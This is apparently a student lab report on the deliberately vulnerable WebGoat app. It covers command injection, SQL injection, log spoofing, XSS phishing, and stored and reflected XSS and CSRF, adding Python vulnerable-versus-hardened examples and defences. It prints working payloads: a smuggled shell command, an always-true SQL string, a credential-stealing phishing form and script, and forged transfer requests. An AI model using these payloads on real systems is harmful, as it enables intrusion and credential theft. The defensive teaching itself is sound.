2018-2019-2 Network Countermeasure Technology 20165322 Exp9 Web Security Basics

Table of Contents

Experimental content and steps

Problems encountered during the experiment

Basic questions answered

Experiments and experience summary

Experimental content and steps

(A) Installing WebGoat

  • WebGoat is a deliberately vulnerable Java web application developed by OWASP to teach the security flaws found in web applications. It runs on any platform with a Java virtual machine and currently provides more than 30 lessons, including cross-site scripting (XSS), access control, thread safety, hidden field manipulation, parameter manipulation, weak session cookies, blind SQL injection, numeric SQL injection, string SQL injection, web services, open authentication failures, dangerous HTML comments, and so on.
  • Download it directly from the link: webgoat-container-7.0.1-war-exec.jar. This jar package seemed to have a problem: the browser crashed several times during the download, and the cause is unclear. In short, with a good network connection and some patience the download will succeed.
  • After downloading, copy the jar into the virtual machine through the shared experiment directory.
  • Run java -jar webgoat-container-7.0.1-war-exec.jar to start WebGoat. When the terminal prints 信息: Starting ProtocolHandler ["http-bio-8080"], WebGoat is up and listening on port 8080; the terminal must stay open for the whole experiment, because closing it stops WebGoat.
  • Enter http://localhost:8080/WebGoat in the browser to reach the WebGoat login screen, and log in with any of the user name/password pairs listed on that page.

Back to Contents

(B) SQL injection attacks

1. Command Injection

  • Technical concept: command injection is a serious threat to any parameter-driven site. The technique behind the attack is easy to learn and can cause extensive damage, up to full compromise of the system. Despite this risk, an incredible number of Internet-facing systems remain vulnerable to this form of attack.
  • Steps
    • Click Injection Flaws - Command Injection
    • Right-click the AccessControlMatrix.help drop-down box, choose Inspect Element to edit the page source, and append "& netstat -an & ipconfig" to the end of the option value as shown in the figure. (ipconfig is the Windows command; on a Linux host such as Kali the equivalent is ifconfig. The value is only ever shown in the browser's drop-down, but the server runs it as part of a shell command, so any value the request carries is executed.)

    • Click View: the output shows the network port usage and IP addresses, so the attack succeeded.
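To show what the Command Injection lesson is exploiting on the server side, the following Python example, added here and not part of the original report or of WebGoat's own code, builds the lesson's "cat <help file>" command the same way (string concatenation handed to a shell) next to a hardened version that allow-lists the file name and never invokes a shell. The help directory, its file and the "echo INJECTED" stand-in for netstat/ifconfig are constructed fixtures for this example, not WebGoat's files.

```python
import os
import re
import subprocess
import tempfile

# Constructed fixture: a help directory with one help file, standing in for WebGoat's
# *.help lesson files. The path and content are assumptions for this example only.
HELP_DIR = tempfile.mkdtemp(prefix="webgoat_help_")
with open(os.path.join(HELP_DIR, "AccessControlMatrix.help"), "w") as f:
    f.write("Access Control Matrix help text\n")


def view_help_vulnerable(help_file: str) -> str:
    """Mirror of the lesson's bug: the <select> value is glued into a shell command.
    The browser normally offers only fixed option values, but the HTTP request can
    carry anything, so shell metacharacters in help_file are interpreted by /bin/sh."""
    cmd = "cat " + os.path.join(HELP_DIR, help_file)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


# Allow-list: a plain name ending in .help, no separators, no '..', no metacharacters.
_SAFE_HELP_NAME = re.compile(r"^[A-Za-z0-9_]+\.help$")


def view_help_hardened(help_file: str) -> str:
    """Hardened version: validate the name against the allow-list, build the path on the
    server side, and pass argv as a list so no shell ever parses user input."""
    if not _SAFE_HELP_NAME.fullmatch(help_file):
        raise ValueError(f"rejected help file name: {help_file!r}")
    path = os.path.join(HELP_DIR, help_file)
    proc = subprocess.run(["cat", path], shell=False, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # ';' chains commands in POSIX sh. The lesson's '&' also runs both commands
    # (cmd.exe chains them; sh backgrounds the first), and 'echo INJECTED' stands in
    # for the netstat / ifconfig commands used in the lesson.
    payload = "AccessControlMatrix.help; echo INJECTED"
    print(view_help_vulnerable(payload))
    try:
        view_help_hardened(payload)
    except ValueError as e:
        print("hardened:", e)
```

The vulnerable function prints the help text followed by INJECTED; the hardened one refuses the same value before anything runs. The allow-list is the important part: quoting with shlex.quote would also stop the injection, but it still lets the caller pick arbitrary paths such as ../../etc/passwd.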

2. String SQL Injection

  • Technical concept: SQL injection attacks are a serious threat to any database-driven site. An attacker can view the contents of the database without knowing a password.
  • Technical principle: construct a SQL injection string based on the following query.
    SELECT * FROM user_data WHERE last_name = '?'
  • Steps:
    • Click Injection Flaws - String SQL Injection
    • Enter Smith' or 1=1-- as the user name to query. This turns the query into SELECT * FROM user_data WHERE last_name = 'Smith' or 1=1--', where -- starts a comment that swallows the trailing quote, so the WHERE condition is always true and every row in the table is returned.
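The following Python example, added here and not taken from the report or from WebGoat, runs the lesson's payload against a constructed in-memory SQLite copy of the user_data table, once through a query built by string concatenation (the lesson's bug) and once through a parameterized query. The table layout and rows are made up for the example.

```python
import sqlite3

# Constructed in-memory stand-in for WebGoat's user_data table; names and numbers are made up.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE user_data (userid INTEGER, first_name TEXT, last_name TEXT, cc_number TEXT);
INSERT INTO user_data VALUES (101, 'Joe',  'Snow',  '987654321');
INSERT INTO user_data VALUES (102, 'John', 'Smith', '2234200065411');
INSERT INTO user_data VALUES (103, 'Jane', 'Plane', '123456789');
""")


def lookup_vulnerable(last_name: str) -> list:
    """The lesson's query, built by string concatenation. The quote in the input closes
    the string literal, ' or 1=1' is parsed as SQL, and '--' comments out the trailing
    quote the application appends."""
    sql = "SELECT * FROM user_data WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(last_name: str) -> list:
    """Parameterized query: the statement text is fixed and the input is bound as a
    value, so the same payload is just a last name that matches nothing."""
    sql = "SELECT * FROM user_data WHERE last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()


if __name__ == "__main__":
    payload = "Smith' or 1=1--"
    print("vulnerable   :", lookup_vulnerable(payload))      # every row
    print("parameterized:", lookup_parameterized(payload))   # []
    print("honest lookup:", lookup_parameterized("Smith"))   # only Smith
```

Binding the value is the whole fix: no escaping of quotes is needed, and the payload cannot change the structure of the statement because it never reaches the SQL parser as text.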

3. Log Spoofing

  • Technical principle: this attack fools the human eye reading a log file. An attacker can use it to cover their tracks in the log or to alter what the log appears to say, and can even write script into the log, which then runs when an administrator views the log through a browser.
  • Steps:
    • Click Injection Flaws - Log Spoofing
    • Enter in the User Name box: Smith Login Succeeded for username admin
    • The page returns the log entry: Login failed for username: Smith Login Succeeded for username admin, all on one line, so the trick is obvious.
    • If instead we enter Smith%0d%0aLogin Succeeded for username: admin as the User Name, the server decodes %0D (carriage return) and %0A (line feed) before writing the entry, so it spans two lines in the log. Enter any password and click Login.
    • The log now appears to show a successful login by admin.

    • What happens if the user name contains a script?
      • Enter the user name admin <script>alert(document.cookie)</script>; an administrator who views the log in a browser sees a popup with the cookie information.
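The following Python example, added here and not part of the report or of WebGoat, reproduces the lesson's log line construction and shows the fix that defeats both tricks above: CR/LF are replaced with visible escapes so a user name cannot start a new log line, and the entry is HTML-entity-encoded so a browser-based log viewer displays a <script> tag as text. The log message format is copied from the lesson; the decoding helper stands in for the web server's form decoding.

```python
import html
import urllib.parse


def decode_form_value(raw: str) -> str:
    """The browser sends Smith%0d%0a...; the server decodes it to CR LF before logging."""
    return urllib.parse.unquote(raw)


def log_failed_login_vulnerable(username: str) -> str:
    """Lesson behaviour: the raw user name is written straight into the log entry."""
    return "Login failed for username: " + username


def sanitize_for_log(value: str) -> str:
    """Neutralise both tricks from the lesson. Line breaks become the two characters
    backslash-r / backslash-n, so one request can only ever produce one log line, and
    '<', '>', '&' and quotes are entity-encoded so a log viewer rendering HTML shows
    the script instead of running it."""
    value = value.replace("\r", "\\r").replace("\n", "\\n")
    return html.escape(value, quote=True)


def log_failed_login_hardened(username: str) -> str:
    return "Login failed for username: " + sanitize_for_log(username)


if __name__ == "__main__":
    payload = decode_form_value("Smith%0d%0aLogin Succeeded for username: admin")
    print(log_failed_login_vulnerable(payload))   # two lines, second one looks genuine
    print(log_failed_login_hardened(payload))     # one line, with \r\n visible
    print(log_failed_login_hardened("admin <script>alert(document.cookie)</script>"))
```

Encoding for the viewer belongs with the log writer only if the logs are known to be read through a browser; a plain-text log would otherwise fill up with entities. What must always happen at the writer is the CR/LF replacement, since that is what makes an entry forgeable.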

Back to Contents

(C) XSS attack

1. Cross-site scripting phishing attacks (Phishing with XSS)

  • Technical principle: it is always good practice to validate all input on the server side. XSS can occur whenever user input is placed into the HTTP response without validation. With the help of XSS an attacker can build a phishing tool or add content to an official page, and the victim finds it hard to recognise that content as a threat.
  • Steps
    • XSS can be used to add elements to an existing page. The solution consists of two parts that must be used together:
      • a form for the victim to fill in;
      • a script that reads the information collected by the form and sends it to the attacker.
    • Write a form with user name and password input boxes and a login button:
    <form>
    <br><br><HR><H3>This feature requires account login:</H3><br><br>
    Enter Username:<br><input type="text" id="user" name="user"><br>
    Enter Password:<br><input type="password" name="pass"><br>
    <input type="submit" name="login" value="login" onclick="hack()">
    </form><br><br><HR>
    • Write a script that reads the user name and password the victim entered on the form and sends them to WebGoat's catcher endpoint, which records them:
    <script>
    function hack()
    {
        // Show the victim what was taken, then leak it via an image request to the catcher.
        alert("Had this been a real attack... Your credentials were just stolen.\nUser Name = " + document.forms[0].user.value + "\nPassword = " + document.forms[0].pass.value);
        XSSImage = new Image;
        XSSImage.src = "http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";
    }
    </script>
    • Combine the two pieces of code and enter them in the search box of XSS - Phishing with XSS. A form asking for a user name and password appears; enter a user name and password and click login, and the information entered is captured by WebGoat and echoed back.

2. Stored XSS Attacks

  • Technical principle: this attack is common on message boards and similar platforms. When a user posts a message containing a JavaScript script, the script is saved in the database along with the message. Because it is part of the message, every time any user opens the page the script is fetched from the database and executed in that user's browser.
  • Steps:
    • Enter any text as the title, enter <script>alert("You've been attacked!!!");</script> in the message box, and click Submit.
    • Click the link to the message in the message list; the popup appears.

3. Reflected XSS Attacks

  • Technical principle: in reflected XSS the attacker crafts a URL containing the attack script and publishes it on another site, or gets the victim to click it via e-mail or other means; the vulnerable page echoes the script back in its response.
  • Steps:
    • Enter the code <script>alert("You've been attacked!!!");</script> in the access code field and click Purchase; the page reflects the input back and the popup appears.
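The following Python example, added here and not part of the report or of WebGoat, models both XSS lessons above: a message board that stores the lesson's payload verbatim and renders it back to every reader (stored), and a purchase page that echoes the access code into its response (reflected). The same output-encoding fix handles both. The in-memory message list and the page fragments are constructed for the example; it also checks the "reject anything containing javascript" rule from the basic-questions section against the lesson's own payload.

```python
import html
from typing import List, Tuple

MESSAGES: List[Tuple[str, str]] = []   # constructed in-memory stand-in for the message-board table

# The payload used in both XSS lessons of the report.
PAYLOAD = '<script>alert("You\'ve been attacked!!!");</script>'


def post_message(title: str, message: str) -> int:
    """Stored XSS, step 1: the message is saved verbatim, script and all. Returns its index."""
    MESSAGES.append((title, message))
    return len(MESSAGES) - 1


def render_message_vulnerable(index: int) -> str:
    """Stored XSS, step 2: the raw message is put back into the page for every reader."""
    title, message = MESSAGES[index]
    return f"<h3>{title}</h3><p>{message}</p>"


def render_message_hardened(index: int) -> str:
    """Entity-encode at output time, for the HTML-body context: '<' becomes '&lt;', so the
    browser shows the script as text and never creates a <script> element."""
    title, message = MESSAGES[index]
    return f"<h3>{html.escape(title)}</h3><p>{html.escape(message)}</p>"


def render_reflected(access_code: str, escape: bool) -> str:
    """Reflected XSS: the access code from the request is echoed straight back in the
    response. With escape=True the same output encoding is applied."""
    shown = html.escape(access_code) if escape else access_code
    return f"<p>Invalid three digit access code: {shown}</p>"


def keyword_filter_blocks(text: str) -> bool:
    """A blacklist that rejects input containing 'javascript'. It does not even match
    the lesson's payload, which is an ordinary <script> tag."""
    return "javascript" in text.lower()


if __name__ == "__main__":
    idx = post_message("news", PAYLOAD)
    print(render_message_vulnerable(idx))        # contains a live <script> element
    print(render_message_hardened(idx))          # contains &lt;script&gt; as text
    print(render_reflected(PAYLOAD, escape=False))
    print(render_reflected(PAYLOAD, escape=True))
    print("keyword filter catches payload:", keyword_filter_blocks(PAYLOAD))  # False
```

html.escape is correct for text placed between tags and inside quoted attributes; data written into a JavaScript block, a URL, or CSS needs the encoding for that context instead, which is why output encoding is chosen per insertion point rather than once at input time.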

Back to Contents

(D) CSRF attacks

  • Before starting, first understand what a cookie is.
  • A cookie (sometimes in the plural, cookies) is a small piece of data that certain websites store on the user's local machine to identify the user and track the session, typically an opaque session identifier. It is simply state that is kept on the client side, and the browser sends it back automatically with every request to that site.

1. CSRF Cross Site Request Forgery

  • Technical principle: cross-site request forgery is an attack in which the victim is tricked into loading a web page that contains an image such as the following:
<img src="https://www.mybank.com/me?transferFunds=5000&to=123456"/>

When the victim's browser renders the page, it requests the "me" endpoint of www.mybank.com with the given parameters in order to fetch the image, even though the URL is actually a funds-transfer function. With that request the browser sends every cookie associated with the site. So if the user is already authenticated to the site and holds a persistent or current session cookie, the site cannot tell this request apart from a legitimate user request. In this way the attacker can make the victim perform actions they never intended, such as "buy goods" or any other function the vulnerable website offers.

  • Steps:
    • In the Parameters menu on the right of the page, note the values of src and menu: 268 and 900 respectively.
    • Enter any title, and in the message box enter <img src="http://localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=5000" width="1" height="1" />. The URL is embedded in the message as a 1x1 pixel image, so it is invisible to other users; the browser loads the "image" automatically whenever the message is displayed, no click on it is needed, and that load is the forged request. Click Submit.
    • A link with the chosen title appears in the Message List. When a user clicks the message, the page loads and displays it, the forged request fires, and 5000 is transferred out of that user's account, which completes the CSRF attack.

2. Bypassing the CSRF confirmation (CSRF Prompt By-Pass)

  • Technical principle: cross-site request forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page containing a "forged request" so that a command is executed with the victim's credentials. Prompting the user to confirm or cancel the command may sound like a solution, but if the prompt is scriptable it can simply be ignored. This lesson shows how to bypass such a prompt by issuing a second forged request. The same approach works for a sequence of prompts, such as a wizard, or for issuing several unrelated forged requests.
  • Steps:
    • In the Parameters menu on the right of the page, note the values of src and menu: 274 and 900 respectively.
    • Enter any value in the title box and the following code in the message box (the first iframe stages the transfer, the second answers the confirmation prompt):
    <iframe src="attack?Screen=274&menu=900&transferFunds=5000"> </iframe>
    <iframe src="attack?Screen=274&menu=900&transferFunds=CONFIRM"> </iframe>
    • After submitting, click the title link; both requests are sent with the viewer's cookie and the transfer goes through without the user confirming anything.
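The following Python example, added here and not part of the report or of WebGoat, models the transfer endpoint behind both CSRF lessons above as a small in-memory server: the vulnerable version trusts any request that carries a valid session cookie, which is exactly what the forged <img> and <iframe> requests do, so the two-step "stage then CONFIRM" flow is bypassed as in the prompt-bypass lesson. The hardened version adds a synchronizer token that a cross-site request cannot supply. Sessions, balances and the request dictionaries are constructed for the example; the cookie handling stands in for what the browser does automatically.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class Session:
    """Server-side session state; the browser holds only the cookie value."""
    user: str
    balance: int
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))
    pending: Optional[int] = None   # amount staged by transferFunds=<n>, awaiting CONFIRM


SESSIONS: Dict[str, Session] = {}   # cookie value -> Session (constructed in-memory store)


def login(user: str, balance: int) -> str:
    """Returns the session cookie, which the browser will attach to every later request
    to this site, including requests triggered by another site's <img> or <iframe>."""
    cookie = secrets.token_hex(16)
    SESSIONS[cookie] = Session(user=user, balance=balance)
    return cookie


def _apply_transfer(s: Session, params: dict) -> str:
    """Two-step flow of the prompt-bypass lesson: stage an amount, then CONFIRM it.
    The first CSRF lesson is the same flow with the CONFIRM step removed."""
    value = params.get("transferFunds", "")
    if value == "CONFIRM":
        if s.pending is None:
            return "nothing to confirm"
        s.balance -= s.pending
        s.pending = None
        return "transfer completed"
    if not value.isdigit():
        return "bad amount"
    s.pending = int(value)
    return "confirm?"


def transfer_vulnerable(cookie: str, params: dict) -> str:
    """Lesson behaviour: a valid session cookie is the only check, so the browser's request
    for an attacker's <iframe src="attack?...transferFunds=5000"> is indistinguishable
    from the user's own, and a second iframe with transferFunds=CONFIRM skips the prompt."""
    return _apply_transfer(SESSIONS[cookie], params)


def transfer_hardened(cookie: str, params: dict) -> str:
    """Synchronizer token: the token is embedded in the page the real user loaded and
    comes back as a form field. A cross-site request gets the cookie attached automatically
    but cannot read the page to obtain the token, so every step, CONFIRM included, is
    refused without it. compare_digest avoids a timing side channel on the comparison."""
    s = SESSIONS[cookie]
    token = params.get("csrf_token", "")
    if not hmac.compare_digest(token, s.csrf_token):
        return "rejected: missing or wrong CSRF token"
    return _apply_transfer(s, params)


if __name__ == "__main__":
    # The victim is logged in; the two forged iframes arrive carrying the cookie only.
    forged = [{"transferFunds": "5000"}, {"transferFunds": "CONFIRM"}]
    c = login("victim", 10000)
    for p in forged:
        print("vulnerable:", transfer_vulnerable(c, p))
    print("balance after forged requests:", SESSIONS[c].balance)   # 5000

    c = login("victim", 10000)
    for p in forged:
        print("hardened:  ", transfer_hardened(c, p))
    print("balance after forged requests:", SESSIONS[c].balance)   # 10000
```

In a real deployment the token is written into the transfer form as a hidden field and the session cookie is additionally set with SameSite=Lax or Strict, so that the browser does not even attach it to the cross-site iframe request; the token check remains the server's own guarantee independent of browser support.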

Back to Contents

Problems encountered during the experiment

  • When installing WebGoat under the 2019 Kali environment, the lesson contents did not appear after opening the web page; after switching to 2018 Kali there was no problem.

Basic questions answered

(1) How a SQL injection attack works, and how to defend against it

  • Principle: a SQL injection vulnerability is a flaw in how a web application handles the query statements it sends to the back-end database. SQL is embedded in an input string, and the program neglects to check for the special characters that let input become part of the statement. The database treats the result as a normal SQL statement and executes it, which can let the attacker perform arbitrary operations on the database, up to and including destroying it.
  • Defense:
    • Use parameterized queries (prepared statements), so that user input is always bound as a value and never parsed as SQL; this is the primary defense.
    • Check input for special characters and strings, as a secondary measure only, since filters are easy to get wrong.
    • Do not store sensitive data in the database in plaintext.
    • Error messages for invalid input should reveal as little information as possible.

(2) How an XSS attack works, and how to defend against it

  • Principle: XSS is a security vulnerability that frequently appears in web applications. It allows a malicious web user to plant code (HTML and client-side script) into a page that is served to other users, tricking the user or the browser into performing unsafe actions or submitting the user's private information to another site.
  • Defense:
    • Encode user-supplied data at output time according to the context it is placed in (HTML entity encoding in the page body, attribute encoding inside attributes), so that it is displayed as text rather than interpreted as markup or script.
    • Check and filter submitted form strings and URL parameters before they are used. A keyword check such as treating any string containing "javascript" as an XSS attack is easily bypassed; the payloads used in this experiment contain no such keyword at all, so filtering can only supplement output encoding, not replace it.

(3) How a CSRF attack works, and how to defend against it

  • Principle: CSRF (cross-site request forgery), also called "one click attack" or "session riding" and abbreviated CSRF or XSRF, is a malicious exploitation of a website in which the attacker forges requests that appear to come from a trusted user in order to abuse the site's trust in that user. It is a confused-deputy attack that relies on the web browser automatically attaching the user's cookies to requests.
  • Defense:
    • Include an unpredictable anti-CSRF token in every state-changing form and verify it on the server; a forged cross-site request cannot read the page and so cannot supply the token. Setting session cookies with the SameSite attribute and checking the Origin/Referer headers add further protection.
    • Use a verification code (captcha) or a confirmation step for every important POST page, bearing in mind that a prompt that can be answered by script, as in the prompt-bypass lesson above, is not enough on its own.
    • Log out of a site before browsing other sites, or clear the browser's cookies when the session ends.

Back to Contents

Experiments and experience summary

The operations in this experiment were simple to carry out in WebGoat but not at all easy to understand. I completed the experiment by referring to the cookie-related material in the WebGoat Chinese manual, and I feel that understanding it more thoroughly will require deeper study.


Origin www.cnblogs.com/wangyaojia/p/10926399.html